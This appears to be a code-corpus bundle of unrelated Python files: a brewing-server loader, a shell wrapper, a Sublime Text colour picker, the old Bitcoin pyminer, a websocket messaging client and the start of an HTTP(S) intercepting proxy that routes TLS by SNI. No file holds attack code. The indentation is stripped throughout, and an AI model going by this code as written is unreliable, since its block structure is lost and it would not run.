files = list(pico_recipe_path().glob("*.json"))
recipes = [load_pico_recipe(file) for file in files]
return recipes
def load_pico_recipe(file):
recipe = PicoBrewRecipe()
recipe.parse(file)
return recipe
def get_pico_recipes():
global pico_recipes
return pico_recipes
def load_active_brew_sessions():
brew_sessions = []
# process brew_sessions from memory
for uid in active_brew_sessions:
brew_sessions.append({'alias': active_brew_sessions[uid].alias,
'graph': get_brew_graph_data(uid, active_brew_sessions[uid].name,
active_brew_sessions[uid].step,
active_brew_sessions[uid].data,
active_brew_sessions[uid].is_pico)})
return brew_sessions
def load_brew_sessions(uid=None):
files = []
if uid:
files = list(brew_archive_sessions_path().glob("*#{}*.json".format(uid)))
else:
files = list(brew_archive_sessions_path().glob("*.json"))
brew_sessions = [load_brew_session(file) for file in files]
return brew_sessions
def load_active_ferm_sessions():
ferm_sessions = []
for uid in active_ferm_sessions:
ferm_sessions.append({'alias': active_ferm_sessions[uid].alias,
'graph': get_ferm_graph_data(uid, active_ferm_sessions[uid].voltage,
active_ferm_sessions[uid].data)})
return ferm_sessions
def load_ferm_sessions():
files = list(ferm_archive_sessions_path().glob("*.json"))
ferm_sessions = [load_ferm_session(file) for file in files]
return ferm_sessions
# Read initial recipe list on load
pico_recipes = []
zymatic_recipes = []
zseries_recipes = []
def initialize_data():
global pico_recipes, zymatic_recipes, zseries_recipes
global brew_sessions
# Read initial recipe list on load
pico_recipes = load_pico_recipes()
zymatic_recipes = load_zymatic_recipes()
zseries_recipes = load_zseries_recipes()
# load all archive brew sessions
brew_sessions = load_active_brew_sessions()
# todo: if anything in ferm/active folder, load data in since the server probably crashed?
# utilities
def increment_zseries_recipe_id():
recipe_id = -1
for r in get_zseries_recipes():
if r.id > recipe_id:
recipe_id = r.id
return recipe_id + 1
|
localshell.py
|
from subprocess import Popen, PIPE
from .abstractshell import AbstractShell
from .shellresult import ShellResult
from .streamreader import StandardStreamReader
from .queue import Queue
from threading import Thread
from shutil import copyfile
from os import chmod, stat, environ
from logging import CRITICAL
class LocalShell(AbstractShell):
def __init__(self, check_xc=False, check_err=False, wait=True, log_level=CRITICAL, **kwargs):
AbstractShell.__init__(self, check_xc=check_xc, check_err=check_err,
wait=wait, log_level=log_level, **kwargs)
self.update(environ)
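# Runs the command through Popen with piped stdout/stderr, attaches a
# StandardStreamReader to each pipe so both streams feed one shared queue,
# and posts the exit code from a helper thread; ShellResult then consumes
# output lines and the exit status from that single queue.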
def execute_command(self, command, env={}, wait=True, check_err=False, cwd=None):
process = Popen(command, env=env, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
queue = Queue()
StandardStreamReader(process.stdout, 1, queue)
StandardStreamReader(process.stderr, 2, queue)
def post_process_exit_code():
queue.put( (0, process.wait()) )
queue.put( (0, None) )
Thread(target=post_process_exit_code).start()
return ShellResult(self, command, queue, wait, check_err)
def do_pull(self, local_path, remote_path):
copyfile(remote_path, local_path)
def do_push(self, local_path, remote_path):
copyfile(local_path, remote_path)
|
sublimecp.py
|
import sublime
import sublime_plugin
import subprocess
import os
import threading
from stat import *
sublime_version = 2
if not sublime.version() or int(sublime.version()) > 3000:
sublime_version = 3
if sublime.platform() == 'windows':
import ctypes
from ctypes import c_int32, c_uint32, c_void_p, c_wchar_p, POINTER
class CHOOSECOLOR(ctypes.Structure):
_fields_ = [('lStructSize', c_uint32),
('hwndOwner', c_void_p),
('hInstance', c_void_p),
('rgbResult', c_uint32),
('lpCustColors', POINTER(c_uint32)),
('Flags', c_uint32),
('lCustData', c_void_p),
('lpfnHook', c_void_p),
('lpTemplateName', c_wchar_p)]
class POINT(ctypes.Structure):
_fields_ = [('x', c_int32),
('y', c_int32)]
CustomColorArray = c_uint32 * 16
CC_SOLIDCOLOR = 0x80
CC_RGBINIT = 0x01
CC_FULLOPEN = 0x02
ChooseColorW = ctypes.windll.Comdlg32.ChooseColorW
ChooseColorW.argtypes = [POINTER(CHOOSECOLOR)]
ChooseColorW.restype = c_int32
GetDC = ctypes.windll.User32.GetDC
GetDC.argtypes = [c_void_p]
GetDC.restype = c_void_p
ReleaseDC = ctypes.windll.User32.ReleaseDC
ReleaseDC.argtypes = [c_void_p, c_void_p] # hwnd, hdc
ReleaseDC.restype = c_int32
GetCursorPos = ctypes.windll.User32.GetCursorPos
GetCursorPos.argtypes = [POINTER(POINT)] # POINT
GetCursorPos.restype = c_int32
GetPixel = ctypes.windll.Gdi32.GetPixel
GetPixel.argtypes = [c_void_p, c_int32, c_int32] # hdc, x, y
GetPixel.restype = c_uint32 # colorref
def get_pixel():
hdc = GetDC(0)
pos = POINT()
GetCursorPos(ctypes.byref(pos))
val = GetPixel(hdc, pos.x, pos.y)
ReleaseDC(0, hdc)
return val
def to_custom_color_array(custom_colors):
cc = CustomColorArray()
for i in range(16):
cc[i] = int(custom_colors[i])
return cc
def from_custom_color_array(custom_colors):
cc = [0] * 16
for i in range(16):
cc[i] = str(custom_colors[i])
return cc
def bgr_to_hexstr(bgr, byte_table=list(['{0:02X}'.format(b) for b in range(256)])):
# 0x00BBGGRR
b = byte_table[(bgr >> 16) & 0xff]
g = byte_table[(bgr >> 8) & 0xff]
r = byte_table[(bgr) & 0xff]
return (r + g + b)
def hexstr_to_bgr(hexstr):
if len(hexstr) == 3:
hexstr = hexstr[0] + hexstr[0] + hexstr[1] + hexstr[1] + hexstr[2] + hexstr[2]
r = int(hexstr[0:2], 16)
g = int(hexstr[2:4], 16)
b = int(hexstr[4:6], 16)
return (b << 16) | (g << 8) | r
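# Fills a CHOOSECOLOR structure, seeds it with either the supplied start colour
# or the pixel currently under the cursor, shows the native Windows colour
# dialog, and returns the chosen colour as an RRGGBB hex string (None on cancel).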
def win_pick(window, starting_color):
paste = None
start_color = None
if starting_color is not None:
start_color = hexstr_to_bgr(starting_color[1:])
s = sublime.load_settings("ColorPicker.sublime-settings")
custom_colors = s.get("custom_colors", ['0'] * 16)
if len(custom_colors) < 16:
custom_colors = ['0'] * 16
s.set('custom_colors', custom_colors)
cc = CHOOSECOLOR()
ctypes.memset(ctypes.byref(cc), 0, ctypes.sizeof(cc))
cc.lStructSize = ctypes.sizeof(cc)
if sublime_version == 2:
cc.hwndOwner = window.hwnd()
else:
# Temporary fix for Sublime Text 3 - For some reason the hwnd crashes it
# Of course, clicking out of the colour picker and into Sublime will make
# Sublime not respond, but as soon as you exit the colour picker it's ok
cc.hwndOwner = None
cc.Flags = CC_SOLIDCOLOR | CC_FULLOPEN | CC_RGBINIT
cc.rgbResult = c_uint32(start_color) if not paste and start_color else get_pixel()
cc.lpCustColors = to_custom_color_array(custom_colors)
if ChooseColorW(ctypes.byref(cc)):
color = bgr_to_hexstr(cc.rgbResult)
else:
color = None
return color
class ColorPicker(object):
# SVG Colors spec: http://www.w3.org/TR/css3-color/#svg-color
SVGColors = {
"aliceblue": "F0F8FF",
"antiquewhite": "FAEBD7",
"aqua": "00FFFF",
"aquamarine": "7FFFD4",
"azure": "F0FFFF",
"beige": "F5F5DC",
"bisque": "FFE4C4",
"black": "000000",
"blanchedalmond": "FFEBCD",
"blue": "0000FF",
"blueviolet": "8A2BE2",
"brown": "A52A2A",
"burlywood": "DEB887",
"cadetblue": "5F9EA0",
"chartreuse": "7FFF00",
"chocolate": "D2691E",
"coral": "FF7F50",
"cornflowerblue": "6495ED",
"cornsilk": "FFF8DC",
"crimson": "DC143C",
"cyan": "00FFFF",
"darkblue": "00008B",
"darkcyan": "008B8B",
"darkgoldenrod": "B8860B",
"darkgray": "A9A9A9",
"darkgreen": "006400",
"darkgrey": "A9A9A9",
"darkkhaki": "BDB76B",
"darkmagenta": "8B008B",
"darkolivegreen": "556B2F",
"darkorange": "FF8C00",
"darkorchid": "9932CC",
"darkred": "8B0000",
"darksalmon": "E9967A",
"darkseagreen": "8FBC8F",
"darkslateblue": "483D8B",
"darkslategray": "2F4F4F",
"darkslategrey": "2F4F4F",
"darkturquoise": "00CED1",
"darkviolet": "9400D3",
"deeppink": "FF1493",
"deepskyblue": "00BFFF",
"dimgray": "696969",
"dimgrey": "696969",
"dodgerblue": "1E90FF",
"firebrick": "B22222",
"floralwhite": "FFFAF0",
"forestgreen": "228B22",
"fuchsia": "FF00FF",
"gainsboro": "DCDCDC",
"ghostwhite": "F8F8FF",
"gold": "FFD700",
"goldenrod": "DAA520",
"gray": "808080",
"green": "008000",
"greenyellow": "ADFF2F",
"grey": "808080",
"honeydew": "F0FFF0",
"hotpink": "FF69B4",
"indianred": "CD5C5C",
"indigo": "4B0082",
"ivory": "FFFFF0",
"khaki": "F0E68C",
"lavender": "E6E6FA",
"lavenderblush": "FFF0F5",
"lawngreen": "7CFC00",
"lemonchiffon": "FFFACD",
"lightblue": "ADD8E6",
"lightcoral": "F08080",
"lightcyan": "E0FFFF",
"lightgoldenrodyellow": "FAFAD2",
"lightgray": "D3D3D3",
"lightgreen": "90EE90",
"lightgrey": "D3D3D3",
"lightpink": "FFB6C1",
"lightsalmon": "FFA07A",
"lightseagreen": "20B2AA",
"lightskyblue": "87CEFA",
"lightslategray": "778899",
"lightslategrey": "778899",
"lightsteelblue": "B0C4DE",
"lightyellow": "FFFFE0",
"lime": "00FF00",
"limegreen": "32CD32",
"linen": "FAF0E6",
"magenta": "FF00FF",
"maroon": "800000",
"mediumaquamarine": "66CDAA",
"mediumblue": "0000CD",
"mediumorchid": "BA55D3",
"mediumpurple": "9370DB",
"mediumseagreen": "3CB371",
"mediumslateblue": "7B68EE",
"mediumspringgreen": "00FA9A",
"mediumturquoise": "48D1CC",
"mediumvioletred": "C71585",
"midnightblue": "191970",
"mintcream": "F5FFFA",
"mistyrose": "FFE4E1",
"moccasin": "FFE4B5",
"navajowhite": "FFDEAD",
"navy": "000080",
"oldlace": "FDF5E6",
"olive": "808000",
"olivedrab": "6B8E23",
"orange": "FFA500",
"orangered": "FF4500",
"orchid": "DA70D6",
"palegoldenrod": "EEE8AA",
"palegreen": "98FB98",
"paleturquoise": "AFEEEE",
"palevioletred": "DB7093",
"papayawhip": "FFEFD5",
"peachpuff": "FFDAB9",
"peru": "CD853F",
"pink": "FFC0CB",
"plum": "DDA0DD",
"powderblue": "B0E0E6",
"purple": "800080",
"red": "FF0000",
"rosybrown": "BC8F8F",
"royalblue": "4169E1",
"saddlebrown": "8B4513",
"salmon": "FA8072",
"sandybrown": "F4A460",
"seagreen": "2E8B57",
"seashell": "FFF5EE",
"sienna": "A0522D",
"silver": "C0C0C0",
"skyblue": "87CEEB",
"slateblue": "6A5ACD",
"slategray": "708090",
"slategrey": "708090",
"snow": "FFFAFA",
"springgreen": "00FF7F",
"steelblue": "4682B4",
"tan": "D2B48C",
"teal": "008080",
"thistle": "D8BFD8",
"tomato": "FF6347",
"turquoise": "40E0D0",
"violet": "EE82EE",
"wheat": "F5DEB3",
"white": "FFFFFF",
"whitesmoke": "F5F5F5",
"yellow": "FFFF00",
"yellowgreen": "9ACD32"
}
def pick(self, window, starting_color=None):
start_color = None
start_color_osx = None
win_use_new_picker = False
if starting_color is not None:
svg_color_hex = self.SVGColors.get(starting_color, None)
if svg_color_hex is not None:
starting_color = svg_color_hex
if self.is_valid_hex_color(starting_color):
start_color = "#" + starting_color
start_color_osx = starting_color
if sublime.platform() == 'windows':
s = sublime.load_settings("ColorPicker.sublime-settings")
win_use_new_picker = s.get('win_use_new_picker', True)
if win_use_new_picker:
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color:
args.append(start_color)
else:
color = win_pick(window, start_color)
elif sublime.platform() == 'osx':
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color_osx:
args.append('-startColor')
args.append(start_color_osx)
else:
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color:
args.append(start_color)
if sublime.platform() != "windows" or win_use_new_picker:
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
color = proc.communicate()[0].strip()
if color:
if (
sublime.platform() != 'windows' or
win_use_new_picker or
sublime_version == 2
):
color = color.decode('utf-8')
# The new win_colorpicker.exe returns a hex color code plus an alpha byte (e.g. #FF0000FF = red with alpha FF).
# This applies only to 'win_colorpicker.exe'.
if color == "CANCEL": # When canceled.
color = ""
else:
color = color.replace('#','')[:6]
return color
def is_valid_hex_color(self, s):
if s.startswith('0x'):
s = s[2:]
if len(s) not in (3, 6):
return False
try:
return 0 <= int(s, 16) <= 0xffffff
except ValueError:
return False
class ColorPickApiGetColorCommand(sublime_plugin.WindowCommand):
def run(self, settings, default_color=None):
prefix = '#'
if default_color is not None:
if default_color.startswith('#'):
default_color = default_color[1:]
elif default_color.startswith('0x'):
prefix = '0x'
default_color = default_color[2:]
s = sublime.load_settings(settings)
color = ColorPicker().pick(self.window, default_color)
s.set('color_pick_return', prefix + color if color else None)
class ColorPickApiGetColorAsyncCommand(sublime_plugin.WindowCommand):
def run(self, settings, default_color=None):
prefix = '#'
if default_color is not None:
if default_color.startswith('#'):
default_color = default_color[1:]
elif default_color.startswith('0x'):
prefix = '0x'
default_color = default_color[2:]
s = sublime.load_settings(settings)
def worker():
color = ColorPicker().pick(self.window, default_color)
s.set('color_pick_return', prefix + color if color else None)
threading.Thread(target=worker).start()
class ColorPickApiIsAvailableCommand(sublime_plugin.ApplicationCommand):
def run(self, settings):
s = sublime.load_settings(settings)
s.set('color_pick_return', True)
# cannot use edit objects in separate threads, so we need a helper command
class ColorPickReplaceRegionsHelperCommand(sublime_plugin.TextCommand):
def run(self, edit, color):
def replaceRegionsRecursion():
regions = self.view.get_regions('ColorPick')
if not regions:
return
region = regions[0]
self.view.erase_regions('ColorPick')
self.view.add_regions('ColorPick', regions[1:])
self.view.replace(edit, region, color)
replaceRegionsRecursion()
replaceRegionsRecursion() # we change where the text points refer, so we have to replace one, and then refetch the locations
class ColorPickCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()
selected = None
prefix = '#'
# get the currently selected color - if any
if len(sel) > 0:
selected = self.view.substr(self.view.word(sel[0])).strip()
if selected.startswith('#'):
selected = selected[1:]
elif selected.startswith('0x'):
selected = selected[2:]
prefix = '0x'
cp = ColorPicker()
regions = []
# remember all regions to replace later
for region in sel:
word = self.view.word(region)
# if the selected word is a valid color, remember it
if cp.is_valid_hex_color(self.view.substr(word)):
# include '#' if present
if prefix == '#' and self.view.substr(word.a - 1) == '#':
word = sublime.Region(word.a - 1, word.b)
# A "0x" prefix is considered part of the word and is included anyway
# remember
regions.append(word)
# otherwise just remember the selected region
else:
regions.append(region)
self.view.erase_regions('ColorPick')
self.view.add_regions('ColorPick', regions)
def worker():
color = cp.pick(self.view.window(), selected)
if color:
# Determine user preference for case of letters (default upper)
s = sublime.load_settings("ColorPicker.sublime-settings")
upper_case = s.get("color_upper_case", True)
if upper_case:
color = color.upper()
else:
color = color.lower()
self.view.run_command('color_pick_replace_regions_helper', {'color': prefix+color})
threading.Thread(target=worker).start()
libdir = os.path.join('ColorPicker', 'lib')
if sublime.platform() == 'osx':
binpath = os.path.join(libdir, 'osx_colorpicker')
elif sublime.platform() == 'linux':
binpath = os.path.join(libdir, 'linux_colorpicker.py')
else:
binpath = os.path.join(libdir, 'win_colorpicker.exe')
def plugin_loaded():
if sublime.platform() == 'osx' or sublime.platform() == 'linux':
binfile = os.path.join(sublime.packages_path(), binpath)
if not os.access(binfile, os.X_OK):
os.chmod(binfile, 0o755)
if sublime_version == 2:
plugin_loaded()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
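# Scans nonces for the supplied getwork job: the static 76-byte header prefix is
# hashed once, then each candidate nonce is appended and double-SHA256 hashed;
# hashes whose top 32 bits are non-zero are rejected quickly, and the rest are
# compared as 256-bit integers against the target.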
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 4567
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
client.py
|
# Copyright 2016 Pavle Jonoski
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from troup.infrastructure import OutgoingChannelOverWS
from troup.distributed import Promise
from troup.threading import IntervalTimer
from troup.node import read_local_node_lock
from troup.messaging import message, serialize, deserialize, Message
from threading import Thread
from datetime import datetime, timedelta
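# CallbackWrapper pairs a user callback with a Promise and a validity window;
# ChannelClient stores one per outgoing message id, resolves it when a reply
# arrives carrying a matching 'reply-for' header, and an IntervalTimer
# periodically fails wrappers whose validity window has expired.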
class CallbackWrapper:
def __init__(self, callback, valid_for, promise=None, created_on=None):
self.callback = callback
self.valid_for = valid_for
self.created_on = created_on or datetime.now()
self.promise = promise or Promise()
def check_expired(self):
if datetime.now() > (timedelta(milliseconds=self.valid_for) + self.created_on):
self.promise.complete(error='Timeout', result=Exception('Timeout'))
def execute_callback(self, result):
if self.callback:
try:
self.callback(result)
except Exception as e:
print('Reply callback raised an exception: %s' % e)
self.promise.complete(result=result)
class ChannelClient:
def __init__(self, nodes_specs=None, reply_timeout=5000, check_interval=5000):
self.nodes_ref = {}
self.channels = {}
self.callbacks = {}
self.reply_timeout = reply_timeout
self.check_interval = check_interval
self.maintenance_timer = self.__build_timer()
self.__build_nodes_refs__(nodes_specs)
def __build_nodes_refs__(self, nodes_specs):
for spec in nodes_specs:
parsed = spec.partition(':')
self.nodes_ref[parsed[0]] = parsed[2]
def __build_timer(self):
timer = IntervalTimer(interval=self.check_interval, offset=self.check_interval,
target=self.__check_expired_callbacks)
timer.start()
return timer
def __check_expired_callbacks(self):
for msgid, wrapper in self.callbacks.items():
wrapper.check_expired()
def __reg_wrapper(self, message, callback):
wrapper = CallbackWrapper(callback=callback, valid_for=5000)
self.callbacks[message.id] = wrapper
return wrapper
def __on_channel_data(self, data, channel):
msg = deserialize(data, Message)
if msg.headers.get('type') == 'reply':
self.__process_reply(msg)
def __process_reply(self, reply):
id = reply.headers.get('reply-for')
if not id:
raise Exception('Invalid reply %s' % reply)
wrapper = self.callbacks.get(id)
if wrapper:
if reply.data.get('error'):
wrapper.promise.complete(error=reply.data.get('reply'))
else:
wrapper.promise.complete(result=reply.data.get('reply'))
def send_message(self, message, to_node=None, on_reply=None):
def reply_callback_wrapper(*args, **kwargs):
if on_reply:
on_reply(*args, **kwargs)
wrapper_promise = Promise()
def do_send():
promises = []
if to_node:
promise = self.send_message_to_node(message, to_node, reply_callback_wrapper)
promises.append(promise)
else:
for name, node in self.nodes_ref.items():
promise = self.send_message_to_node(message, name, reply_callback_wrapper)
promises.append(promise)
results = []
for p in promises:
results.append(p.result)
if len(results) == 1:
wrapper_promise.complete(result=results[0])
else:
wrapper_promise.complete(result=True)
def run_in_thread():
try:
do_send()
except Exception as e:
wrapper_promise.complete(error=e)
Thread(target=run_in_thread).start()
return wrapper_promise
def send_message_to_node(self, message, node, on_reply):
channel = self.get_channel(node)
wrapper = self.__reg_wrapper(message=message, callback=on_reply)
ser_message = serialize(message)
channel.send(ser_message)
return wrapper.promise
def get_channel(self, for_node):
channel = self.channels.get(for_node)
if not channel:
channel = self.build_channel(for_node)
return channel
def build_channel(self, for_node):
ref = self.nodes_ref.get(for_node)
if not ref:
raise Exception('Unknown node reference [%s]' % for_node)
return self.create_channel(for_node, ref)
def create_channel(self, node_name, reference):
chn = OutgoingChannelOverWS(node_name, reference)
def on_data(data):
#print('DATA %s' % data)
self.__on_channel_data(data, channel=chn)
chn.register_listener(on_data)
chn.open()
self.channels[node_name] = chn
return chn
def shutdown(self):
for name, channel in self.channels.items():
channel.close()
self.maintenance_timer.cancel()
def client_to_local_node():
lock = read_local_node_lock()
client = ChannelClient(nodes_specs=['%s:%s' % (lock.get_info('name'), lock.get_info('url'))])
return client
class CommandAPI:
def __init__(self, channel_client):
self.channel_client = channel_client
def send(self, command, to_node=None, on_reply=None):
return self.channel_client.send_message(message=command, to_node=to_node, on_reply=on_reply)
def monitor(self, command_ref):
pass
def command(name, data):
return message(data=data).header('type', 'command').header('command', name).build()
def task(type, data, ttl=None, track_out=False, buffer=None):
return message().header('type', 'task').header('ttl', ttl).\
header('task-type', 'process').header('process-type', type).\
header('consume-out', track_out).header('buffer-size', buffer).\
value('process', data).build()
def shutdown(self):
self.channel_client.shutdown()
if __name__ == '__main__':
from argparse import ArgumentParser
from json import loads, dumps
parser = ArgumentParser(prog="troup.client", description="Low level troup system client")
parser.add_argument('--node', help='Node connection URL.', default='ws://localhost:7000')
parser.add_argument('-t', '--type', default='command', help='Message type. May be "command" or "task".')
parser.add_argument('-d', '--data', help='Message data. This is usually a JSON string.')
parser.add_argument('-H', '--header', nargs='+', help='Message headers in the form HEADER_NAME=VALUE.')
parser.add_argument('--reply-timeout', default=5000, help='Message reply timeout in milliseconds.')
parser.add_argument('--check-interval', default=1000, help='Interval to check for timeouts in milliseconds.')
parser.add_argument('-c', '--command', help='The command name. Used only when type is "command".')
parser.add_argument('-v', '--verbose', help='Be more verbose.', action='store_true')
parser.add_argument('--as-json', action='store_true',
help='Try to serialize the result as JSON and print it on stdout.')
args = parser.parse_args()
def printout(*arguments):
if args.verbose:
print(*arguments)
data = args.data or '{}'
data = loads(data)
mb = message(data=data)
for header in args.header or []:
try:
header_name, value = header.split('=')
mb.header(header_name, value)
except Exception as e:
raise Exception('Invalid header value %s' % header) from e
mb.header('type', args.type)
if args.type == 'command' and args.command:
mb.header('command', args.command)
api = None
try:
message = mb.build()
channel_client = ChannelClient(nodes_specs=['TARGET:%s'%args.node], reply_timeout=args.reply_timeout,
check_interval=args.check_interval)
api = CommandAPI(channel_client=channel_client)
printout('Sending to ', args.node)
promise = api.send(command=message, to_node='TARGET')
result = promise.result
if args.as_json:
print(dumps(result))
else:
print(result)
finally:
if api:
api.shutdown()
|
itcproxy.py
|
#!/usr/bin/env python
#
# Copyright 2017 Michal Belica <https://beli.sk>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
VERSION = '0.0.1'
PROG_NAME = "ItcProxy"
DESCRIPTION = 'ItcProxy - HTTP(S) intercepting proxy'
import SocketServer
import BaseHTTPServer
import scapy
import httplib
import select
import argparse
import threading
import time
import sys
from scapy_ssl_tls.ssl_tls import *
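# Relays bytes in both directions between the client socket and the upstream
# proxy socket using select(); returns when either side closes (recv yields
# zero bytes) or the optional shutdown event is set.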
def data_loop(sock, outsock, shutdown=None, bufsize=4096):
while True:
(rtr, rtw, err) = select.select([sock, outsock], [], [sock, outsock], 1)
if shutdown is not None and shutdown.is_set(): break
for s in rtr:
if s == sock:
direction = 1 # from client to remote
elif s == outsock:
direction = 2 # from remote to client
else:
raise Exception("Unknown socket found in loop!")
data = s.recv(bufsize)
if len(data) == 0:
return
if direction == 1:
outsock.sendall(data)
else:
sock.sendall(data)
class TLSTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(4096)
tls = TLS(data)
#tls.show()
ssl_hs_type = tls.records[0].payload.type
if ssl_hs_type != 1:
raise Exception('Not client hello')
target_host = str(tls.records[0].payload[TLSExtServerNameIndication].server_names[0].data)
print "TLS request from %s:%d for %s" % ((self.client_address) + (target_host,))
out_con = httplib.HTTPConnection(self.server.upstream_host, self.server.upstream_port)
out_con.set_tunnel(target_host, 443)
out_con.send(data)
data_loop(self.request, out_con.sock)
self.request.close()
out_con.sock.close()
class HTTPHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def handle_one_request(self):
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.send_error(414)
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
return
hostport = self.headers.get('host', None)
if self.path.startswith('http:') or self.command.upper() == 'CONNECT':
url = self.path
else:
if hostport is None:
raise Exception('Incoming request without full URL or Host header')
url = 'http://%s%s' % (hostport, self.path)
